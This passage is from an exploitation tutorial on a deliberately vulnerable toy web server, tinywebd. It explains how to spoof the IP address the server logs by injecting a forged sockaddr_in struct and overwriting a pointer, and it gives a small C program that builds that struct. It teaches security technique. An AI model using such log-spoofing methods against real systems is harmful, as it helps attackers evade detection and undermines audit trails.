Graphics Programs Reference
In-Depth Information
0x660
Advanced Camouflage
Our current stealth exploit only camouflages the web request; however, the
IP address and timestamp are still written to the log file. This type of camou-
flage will make the attacks harder to find, but they are not invisible. Having
your IP address written to logs that could be kept for years might lead to
trouble in the future. Since we're mucking around with the insides of the
tinyweb daemon now, we should be able to hide our presence even better.
0x661
Spoofing the Logged IP Address
The IP address written to the log file comes from the
client_addr_ptr
, which is
passed to
handle_connection()
.
Code Segment from tinywebd.c
void handle_connection(int sockfd, struct sockaddr_in *
client_addr_ptr
, int logfd) {
unsigned char *ptr, request[500], resource[500], log_buffer[500];
int fd, length;
length = recv_line(sockfd, request);
sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(
client_addr_ptr->sin_addr
),
ntohs(
client_addr_ptr->sin_port
), request);
To spoof the IP address, we just need to inject our own
sockaddr_in
structure and overwrite the
client_addr_ptr
with the address of the injected
structure. The best way to generate a
sockaddr_in
structure for injection is to
write a little C program that creates and dumps the structure. The following
source code builds the struct using command-line arguments and then writes
the struct data directly to file descriptor 1, which is standard output.
addr_struct.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
struct sockaddr_in addr;
if(argc != 3) {
printf("Usage: %s <target IP> <target port>\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
write(1, &addr, sizeof(struct sockaddr_in));
}
